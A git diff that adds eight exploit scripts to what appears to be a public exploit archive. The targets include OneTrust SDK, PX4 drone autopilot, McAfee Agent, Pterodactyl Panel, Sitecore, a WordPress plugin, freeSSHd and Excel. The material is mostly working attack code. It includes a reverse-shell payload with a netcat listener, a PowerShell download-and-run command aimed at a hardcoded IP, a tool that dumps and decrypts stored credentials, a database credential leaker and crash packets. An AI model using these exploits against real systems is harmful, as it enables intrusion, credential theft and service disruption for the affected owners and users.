diff --git a/exploits/linux/remote/52340.txt b/exploits/linux/remote/52340.txt new file mode 100644 index 000000000..fda1aeb38 --- /dev/null +++ b/exploits/linux/remote/52340.txt @@ -0,0 +1,84 @@ +- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS) +- **Date**: 01/01/2025 +- **Exploit Author**: Alameen Karim Merali +- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api) +- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js) +- **Version**: 6.33.0 +- **Tested on**: Kali Linux +- **CVE ID**: CVE-2024-57708 + +## Vulnerability Summary + +A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application. + +## Technical Details + +The affected code includes prototype assignment logic such as: + +```javascript +var o = function(e, t) { + return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...); +}; +``` + +If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally. + +## Proof-of-Concept (PoC) + +```javascript +function testPrototypePollution() { + const maliciousPayload = { + "__proto__": { + polluted: "yes" + } + }; + + // Using vulnerable function 'o' + try { + o({}, maliciousPayload); + console.log("After o:", {}.polluted); // "yes" + } catch (e) { + console.error("Error testing o:", e); + } + + // Using Object.assign + try { + Object.assign({}, maliciousPayload); + console.log("After Object.assign:", {}.polluted); // "yes" + } catch (e) { + console.error("Error testing Object.assign:", e); + } + + // Cleanup + delete Object.prototype.polluted; +} +testPrototypePollution(); +``` + +## Browser Console PoC (DevTools) + +```javascript +var maliciousObj = { __proto__: { hacked: true } }; +var newObj = Object.create(maliciousObj); +console.log(newObj.hacked); // true +``` + +Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v) + +## Steps to Reproduce + +1. Save the PoC script above as `exploit.js` +2. Run using Node.js: `node exploit.js` +3. Observe polluted output (`{}.polluted === "yes"`) +4. Alternatively, run the payload in browser DevTools + +## Impact + +- Global object pollution +- Application logic errors +- Potential DoS +- Further exploitation depending on context + +## Recommendation + +Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation. \ No newline at end of file diff --git a/exploits/multiple/remote/52339.py b/exploits/multiple/remote/52339.py new file mode 100755 index 000000000..fa471187e --- /dev/null +++ b/exploits/multiple/remote/52339.py @@ -0,0 +1,97 @@ +# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS) +# Author: Mohammed Idrees Banyamer (@banyamer_security) +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-21 +# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim) +# CVE: CVE-2025-5640 +# Type: Denial of Service (DoS) via Buffer Overflow +# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station) +# Author Country: Jordan +# Description: +# A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered +# when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS. +# An attacker with access to the MAVLink communication channel can send a crafted packet +# to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates +# a proof-of-concept that causes the PX4 autopilot to crash via UDP. + + +import argparse +import binascii +from pymavlink import mavutil +import sys + +# Exploit payload (malformed MAVLink hex) +hex_payload = ( + "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352" + "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78" + "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6" +) + +def connect_to_px4(ip, port, timeout, verbose=False): + try: + if verbose: + print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...") + master = mavutil.mavlink_connection(f"udp:{ip}:{port}") + master.wait_heartbeat(timeout=timeout) + if verbose: + print("[+] PX4 heartbeat received. Connection OK.") + return master + except Exception as e: + print(f"[!] Error connecting to PX4: {e}") + sys.exit(1) + +def send_dos_packet(master, verbose=False): + try: + payload = binascii.unhexlify(hex_payload) + master.write(payload) + print("[+] Exploit packet sent. Monitor PX4 for crash.") + except Exception as e: + print(f"[!] Failed to send payload: {e}") + sys.exit(1) + +def main(): + usage = """ + PX4 Exploit Tool - CVE-2025-5640 + ================================= + Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink. + + USAGE: + python3 px4_exploit_tool.py [OPTIONS] + + EXAMPLES: + # Run DoS attack on default PX4 SITL + python3 px4_exploit_tool.py --mode dos + + # Test connectivity to a real drone + python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550 + + OPTIONS: + --ip Target IP address (default: 127.0.0.1) + --port Target UDP port (default: 14540) + --mode Mode of operation: dos (default), check + --timeout Timeout in seconds for heartbeat (default: 5) + --verbose Enable verbose output + """ + parser = argparse.ArgumentParser( + description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security", + epilog=usage, + formatter_class=argparse.RawDescriptionHelpFormatter + ) + parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)") + parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)") + parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)") + parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection") + parser.add_argument("--verbose", action="store_true", help="Enable verbose output") + + args = parser.parse_args() + + master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose) + + if args.mode == "check": + print("[*] PX4 is alive. Connection test passed.") + elif args.mode == "dos": + send_dos_packet(master, args.verbose) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52345.txt b/exploits/multiple/remote/52345.txt new file mode 100644 index 000000000..9f6cf7e22 --- /dev/null +++ b/exploits/multiple/remote/52345.txt @@ -0,0 +1,182 @@ +Exploit Title: McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information +Date: 24 June 2025 +Exploit Author: Keenan Scott +Vendor Homepage: hxxps[://]www[.]mcafee[.]com/ +Software Download: N/A (Unable to find) +Version: < 5.7.6 +Tested on: Windows 11 +CVE: CVE-2022-1257 + +<# +.SYNOPSIS + Dump and decrypt encrypted Windows credentials from Trellix Agent Database ("C:\ProgramData\McAfee\Agent\DB\ma.db") - PoC for CVE-2022-1257. Made by scottk817 + +.DESCRIPTION + This script demonstrates exploitation of CVE-2022-1257, a vulnerability in McAfee's Trellix Agent Database where attackers can retrieve and decrypt credentials from the `ma.db` database file. + +.LINK + https://nvd.nist.gov/vuln/detail/cve-2022-1257 + https://github.com/funoverip/mcafee-sitelist-pwd-decryption/blob/master/mcafee_sitelist_pwd_decrypt.py + https://mrd0x.com/abusing-mcafee-vulnerabilities-misconfigurations/ + https://tryhackme.com/room/breachingad + +.OUTPUTS + CSV in stdOut: + Username,Password +#> + + + +# Arguments +[CmdletBinding()] +param ( + [string]$DbSource = 'C:\ProgramData\McAfee\Agent\DB\ma.db', + [string]$TempFolder = $env:TEMP +) + + + +### Initialize use of WinSQLite3 ### +$cls = "WinSQLite_{0}" -f ([guid]::NewGuid().ToString('N')) + +$code = @" +using System; +using System.Runtime.InteropServices; + +public static class $cls +{ + public const int SQLITE_OK = 0; + public const int SQLITE_ROW = 100; + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern int sqlite3_open_v2( + [MarshalAs(UnmanagedType.LPStr)] string filename, + out IntPtr db, + int flags, + IntPtr vfs + ); + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern int sqlite3_close(IntPtr db); + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern int sqlite3_prepare_v2( + IntPtr db, string sql, int nByte, + out IntPtr stmt, IntPtr pzTail + ); + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern int sqlite3_step(IntPtr stmt); + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern IntPtr sqlite3_column_text(IntPtr stmt, int col); + + [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)] + public static extern int sqlite3_finalize(IntPtr stmt); +} +"@ + +# SQL statement to retrieve usersnames and encrypted passwords from ma.db +$sql = @" +SELECT AUTH_USER, AUTH_PASSWD +FROM AGENT_REPOSITORIES +WHERE AUTH_PASSWD IS NOT NULL; +"@ + +Add-Type -TypeDefinition $code -PassThru | Out-Null +$type = [type]$cls + + + +### Decode and Decrypt ### +# Function to decode, and decrypt the credentials found in the DB using the static keys used for every Trellix agent. +function Invoke-McAfeeDecrypt { + param([string]$B64) + + [byte[]]$mask = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06, + 0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19 + [byte[]]$buf = [Convert]::FromBase64String($B64.Trim()) + for ($i = 0; $i -lt $buf.Length; $i++) { + $buf[$i] = $buf[$i] -bxor $mask[$i % $mask.Length] + } + + $sha = [System.Security.Cryptography.SHA1]::Create() + [byte[]]$key = $sha.ComputeHash([Text.Encoding]::ASCII.GetBytes("")) + (0..3 | ForEach-Object { 0 }) + + $tdes = [System.Security.Cryptography.TripleDES]::Create() + $tdes.Mode = 'ECB' + $tdes.Padding = 'None' + $tdes.Key = $key + [byte[]]$plain = $tdes.CreateDecryptor().TransformFinalBlock($buf, 0, $buf.Length) + + $i = 0 + while ($i -lt $plain.Length -and $plain[$i] -ge 0x20 -and $plain[$i] -le 0x7E) { + $i++ + } + if ($i -eq 0) { return '' } + [Text.Encoding]::UTF8.GetString($plain, 0, $i) +} + + +### Copy ma.db ### +# Copy ma.db over to temp directory add GUID incase it already exists there. +$tmp = Join-Path $TempFolder ("ma_{0}.db" -f ([guid]::NewGuid())) +Copy-Item -LiteralPath $DbSource -Destination $tmp -Force + +### Pull records ### +$dbPtr = [IntPtr]::Zero +$stmtPtr = [IntPtr]::Zero +$flags = 1 +$rc = $type::sqlite3_open_v2($tmp, [ref]$dbPtr, $flags, [IntPtr]::Zero) + +if ($rc -ne $type::SQLITE_OK) { + $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi( + $type::sqlite3_errmsg($dbPtr)) + Throw "sqlite3_open_v2 failed (code $rc) : $msg" +} + +$rc = $type::sqlite3_prepare_v2($dbPtr, $sql, -1, [ref]$stmtPtr, [IntPtr]::Zero) + +if ($rc -ne $type::SQLITE_OK) { + $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi( + $type::sqlite3_errmsg($dbPtr)) + $type::sqlite3_close($dbPtr) | Out-Null + Throw "sqlite3_prepare_v2 failed (code $rc) : $msg" +} + +$buffer = [System.Collections.Generic.List[string]]::new() +while ($type::sqlite3_step($stmtPtr) -eq $type::SQLITE_ROW) { + $uPtr = $type::sqlite3_column_text($stmtPtr, 0) + $pPtr = $type::sqlite3_column_text($stmtPtr, 1) + + $user = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($uPtr) + $pass = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($pPtr) + + if ($user -and $pass) { + $buffer.Add("$user,$pass") + } +} + +### Cleanup ### +# Finish and close SQL +$type::sqlite3_finalize($stmtPtr) | Out-Null +$type::sqlite3_close($dbPtr) | Out-Null + +# Delete the ma.db file copied to the temp file +Remove-Item $tmp -Force -ErrorAction SilentlyContinue + +### Process encrypted credentials ### +# For each row of credentials decrypt them and print plaintext to standard out. +foreach ($line in $buffer) { + $rec = $line -split ',', 2 + if ($rec.Length -eq 2) { + $username = $rec[0] + try { + $password = Invoke-McAfeeDecrypt $rec[1] + } catch { + $password = "[DECRYPT-ERROR] $_" + } + "Username,Password" + "$username,$password" + } +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52341.py b/exploits/multiple/webapps/52341.py new file mode 100755 index 000000000..b5a682df2 --- /dev/null +++ b/exploits/multiple/webapps/52341.py @@ -0,0 +1,48 @@ +# Exploit Title: Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE) +# Date: 22/06/2025 +# Exploit Author: Zen-kun04 +# Vendor Homepage: https://pterodactyl.io/ +# Software Link: https://github.com/pterodactyl/panel +# Version: < 1.11.11 +# Tested on: Ubuntu 22.04.5 LTS +# CVE: CVE-2025-49132 + + +import requests +import json +import argparse +import colorama +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +arg_parser = argparse.ArgumentParser( + description="Check if the target is vulnerable to CVE-2025-49132.") +arg_parser.add_argument("target", help="The target URL") +args = arg_parser.parse_args() + +try: + target = args.target.strip() + '/' if not args.target.strip().endswith('/') else args.target.strip() + r = requests.get(f"{target}locales/locale.json?locale=../../../pterodactyl&namespace=config/database", allow_redirects=True, timeout=5, verify=False) + if r.status_code == 200 and "pterodactyl" in r.text.lower(): + try: + raw_data = r.json() + data = { + "success": True, + "host": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("host", "N/A"), + "port": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("port", "N/A"), + "database": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("database", "N/A"), + "username": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("username", "N/A"), + "password": raw_data["../../../pterodactyl"]["config/database"]["connections"]["mysql"].get("password", "N/A") + } + print(f"{colorama.Fore.LIGHTGREEN_EX}{target} => {data['username']}:{data['password']}@{data['host']}:{data['port']}/{data['database']}{colorama.Fore.RESET}") + except json.JSONDecodeError: + print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET) + except TypeError: + print(colorama.Fore.YELLOW + "Vulnerable but no database" + colorama.Fore.RESET) + else: + print(colorama.Fore.RED + "Not vulnerable" + colorama.Fore.RESET) +except requests.RequestException as e: + if "NameResolutionError" in str(e): + print(colorama.Fore.RED + "Invalid target or unable to resolve domain" + colorama.Fore.RESET) + else: + print(f"{colorama.Fore.RED}Request error: {e}{colorama.Fore.RESET}") \ No newline at end of file diff --git a/exploits/multiple/webapps/52344.py b/exploits/multiple/webapps/52344.py new file mode 100755 index 000000000..c654ab15f --- /dev/null +++ b/exploits/multiple/webapps/52344.py @@ -0,0 +1,56 @@ +# Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE) +# Exploit Author: Yesith Alvarez +# Vendor Homepage: https://developers.sitecore.com/downloads +# Version: Sitecore 10.3 - 10.4 +# CVE : CVE-2025-27218 +# Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py + +from requests import Request, Session +import sys +import base64 + + +def title(): + print(''' + + _______ ________ ___ ___ ___ _____ ___ ______ ___ __ ___ + / ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \____ |__ \/_ |/ _ \ + | | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | / / ) || | (_) | + | | \ \/ / | __|______/ /| | | |/ /|___ \______/ / / / / / | |> _ < + | |____ \ / | |____ / /_| |_| / /_ ___) | / /_ / / / /_ | | (_) | + \_____| \/ |______| |____|\___/____|____/ |____/_/ |____||_|\___/ + + +[+] Remote Code Execution +Author: Yesith Alvarez +Github: https://github.com/yealvarez +Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ +Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py + ''') + +def exploit(url): +# This payload must be generated externally with ysoserial.net +# Example: ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://34.134.71.169/111.html\")'" + payload = 'AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L' + payload_encoded = payload + headers = {'Thumbnailsaccesstoken': payload_encoded} + s = Session() + + req = Request('GET', url, headers=headers) + prepped = req.prepare() + resp = s.send(prepped, verify=False, timeout=15) + + print(prepped.headers) + print(url) + print(resp.status_code) + print(resp.text) + + +if __name__ == '__main__': + title() + if len(sys.argv) < 2: + print('[+] USAGE: python3 %s https://\n' % sys.argv[0]) + print('[+] Example: python3 %s https://192.168.0.10\n' % sys.argv[0]) + exit(0) + else: + exploit(sys.argv[1]) \ No newline at end of file diff --git a/exploits/multiple/webapps/52346.py b/exploits/multiple/webapps/52346.py new file mode 100755 index 000000000..63f22bdc7 --- /dev/null +++ b/exploits/multiple/webapps/52346.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python3 + +# Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE) +# Date: 25-06-2025 +# Exploit Author: Huseyin Mardini (@housma) +# Original Researcher: Luka Sikic +# Original Exploit Author: hash3liZer +# Vendor Homepage: https://wordpress.org/plugins/social-warfare/ +# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip +# Version: <= 3.5.2 +# CVE: CVE-2019-9978 +# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04) +# Python Version: Python 3.x +# Reference: https://www.exploit-db.com/exploits/46794 +# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978 + +# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794) appears to no longer work as intended in many modern environments + +# Usage: +# 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP. +# 2. Run the script: `python3 exploit.py` +# 3. It will: +# - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE) +# - Start an HTTP server on `HTTP_PORT` to host the payload +# - Start a Netcat listener on `LISTEN_PORT` +# - Trigger the vulnerability via the vulnerable `swp_debug` parameter +# 4. On success, you get a reverse shell as `www-data`. +# +# Note: +# - PAYLOAD_FILE defines only the name of the file to be created and served. +# - Make sure ports 8001 and 4444 are open and not in use. + +import requests +import threading +import http.server +import socketserver +import os +import subprocess +import time + +# --- Config --- +TARGET_URL = "http://example.com" +ATTACKER_IP = "xxx.xxx.xx.xx" # Change to your attack box IP +HTTP_PORT = 8000 +LISTEN_PORT = 4444 +PAYLOAD_FILE = "payload.txt" + + +def create_payload(): + """Write exact reverse shell payload using valid PHP syntax""" + payload = f'
system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")
' + with open(PAYLOAD_FILE, "w") as f: + f.write(payload) + print(f"[+] Payload written to {PAYLOAD_FILE}") + + +def start_http_server(): + """Serve payload over HTTP""" + handler = http.server.SimpleHTTPRequestHandler + with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd: + print(f"[+] HTTP server running at port {HTTP_PORT}") + httpd.serve_forever() + + +def start_listener(): + """Start Netcat listener""" + print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...") + subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)]) + + +def send_exploit(): + """Trigger the exploit with vulnerable parameter""" + payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}" + exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}" + print(f"[+] Sending exploit: {exploit}") + try: + requests.get(exploit, timeout=5) + except requests.exceptions.RequestException: + pass + + +def main(): + create_payload() + + # Start web server in background + http_thread = threading.Thread(target=start_http_server, daemon=True) + http_thread.start() + time.sleep(2) # Give server time to start + + # Start listener in background + listener_thread = threading.Thread(target=start_listener) + listener_thread.start() + time.sleep(1) + + # Send the malicious request + send_exploit() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print("[-] Interrupted by user.") \ No newline at end of file diff --git a/exploits/windows/remote/52342.txt b/exploits/windows/remote/52342.txt new file mode 100644 index 000000000..652ece482 --- /dev/null +++ b/exploits/windows/remote/52342.txt @@ -0,0 +1,95 @@ +# Exploit Title: freeSSHd 1.0.9 - Denial of Service (DoS) +# Date: 2024-01-13 +# Discovery by: Fernando Mengali +# Linkedin: https://www.linkedin.com/in/fernando-mengali/ +# Software Link: https://www.exploit-db.com/apps/be82447d556d60db55053d658b4822a8-freeSSHd.exe +# Version: 1.0.9 +# Tested on: Window XP Professional - Service Pack 2 and 3 - English +# Vulnerability Type: Denial of Service (DoS) +# Tested on: Windows XP - SP3 - English +# CVE: CVE-2024-0723 + + +use IO::Socket; + + +#2. Proof of Concept - PoC + + $sis="$^O"; + + if ($sis eq "windows"){ + $cmd="cls"; + } else { + $cmd="clear"; + } + + system("$cmd"); + + intro(); + main(); + + print "[+] Exploiting... \n"; + +my $bufff = + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"x18; + + + my $payload = + "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" . + "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" . + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde".("A" x 1067); + + $payload .= $payload; + $payload .= "C" x 19021 . "\r\n"; + +my $i=0; +while ($i<=18) { + my $sock = IO::Socket::INET->new( + PeerAddr => $ip, + PeerPort => $port, + Proto => 'tcp' + ) or die "Cannot connect!\n"; + + if (<$sock> eq '') { + print "[+] Done - Exploited success!!!!!\n\n"; + exit; + } + + $sock->send($payload) or die "Exploited successuful!!!"; + +$i++; +} + + + + + sub intro { + print q { + + + _/| + // o\ + || ._) + //__\ + )___( + + [+] freeSSHd 1.0.9 - Denial of Service (DoS) + + [*] Coded by Fernando Mengali + + [@] e-mail: fernando.mengalli@gmail.com + + } + } + + sub main { + +our ($ip, $port) = @ARGV; + + unless (defined($ip) && defined($port)) { + + print " \nUsage: $0 \n"; + exit(-1); + + } + } \ No newline at end of file diff --git a/exploits/windows/remote/52343.py b/exploits/windows/remote/52343.py new file mode 100755 index 000000000..f4554334d --- /dev/null +++ b/exploits/windows/remote/52343.py @@ -0,0 +1,156 @@ +# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE) +# Author: nu11secur1ty +# Date: 06/24/2025 +# Vendor: Microsoft +# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af +# Reference: +https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165 +# CVE: CVE-2025-47165 +# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, +Microsoft 365 Apps for Enterprise + +# Description: +The attacker can trick any user into opening and executing their code by +sending a malicious DOCM file via email or a streaming server. After the +execution of the victim, his machine can be infected or even worse than +ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE +MACROS OPTIONS FROM YOUR OFFICE 365!!! + +#!/usr/bin/python + +import os +import sys +import pythoncom +from win32com.client import Dispatch +import http.server +import socketserver +import socket +import threading +import zipfile + +PORT = 8000 +DOCM_FILENAME = "salaries.docm" +ZIP_FILENAME = "salaries.zip" +DIRECTORY = "." + +def create_docm_with_macro(filename=DOCM_FILENAME): + pythoncom.CoInitialize() + word = Dispatch("Word.Application") + word.Visible = False + + try: + doc = word.Documents.Add() + vb_project = doc.VBProject + vb_component = vb_project.VBComponents("ThisDocument") + + macro_code = ''' +Sub AutoOpen() + //YOUR EXPLOIT HERE + // All OF YPU PLEASE WATCH THE DEMO VIDEO + // Best Regards to packetstorm.news and OFFSEC +End Sub +''' + + vb_component.CodeModule.AddFromString(macro_code) + + doc.SaveAs(os.path.abspath(filename), FileFormat=13) + print(f"[+] Macro-enabled Word document created: {filename}") + + except Exception as e: + print(f"[!] Error creating document: {e}") + finally: + doc.Close(False) + word.Quit() + pythoncom.CoUninitialize() + +def zip_docm(docm_path, zip_path): + with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED) +as zipf: + zipf.write(docm_path, arcname=os.path.basename(docm_path)) + print(f"[+] Created ZIP archive: {zip_path}") + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + s.connect(("8.8.8.8", 80)) + ip = s.getsockname()[0] + except Exception: + ip = "127.0.0.1" + finally: + s.close() + return ip + +class Handler(http.server.SimpleHTTPRequestHandler): + def __init__(self, *args, **kwargs): + super().__init__(*args, directory=DIRECTORY, **kwargs) + +def run_server(): + ip = get_local_ip() + print(f"[+] Starting HTTP server on http://{ip}:{PORT}") + print(f"[+] Place your macro docm and zip files in this directory to +serve them.") + print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}") + with socketserver.TCPServer(("", PORT), Handler) as httpd: + print("[+] Server running, press Ctrl+C to stop") + httpd.serve_forever() + +if __name__ == "__main__": + if os.name != "nt": + print("[!] This script only runs on Windows with MS Word +installed.") + sys.exit(1) + + print("[*] Creating the macro-enabled document...") + create_docm_with_macro(DOCM_FILENAME) + + print("[*] Creating ZIP archive of the document...") + zip_docm(DOCM_FILENAME, ZIP_FILENAME) + + print("[*] Starting HTTP server in background thread...") + server_thread = threading.Thread(target=run_server, daemon=True) + server_thread.start() + + try: + while True: + pass # Keep main thread alive + except KeyboardInterrupt: + print("\n[!] Server stopped by user.") + + +``` + +# Reproduce: +[href](https://www.youtube.com/watch?v=CSb76-OG-Tg) + +# Buy an exploit only: +[href](https://satoshidisk.com/pay/COiBVA) + +# Time spent: +01:37:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + + + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ 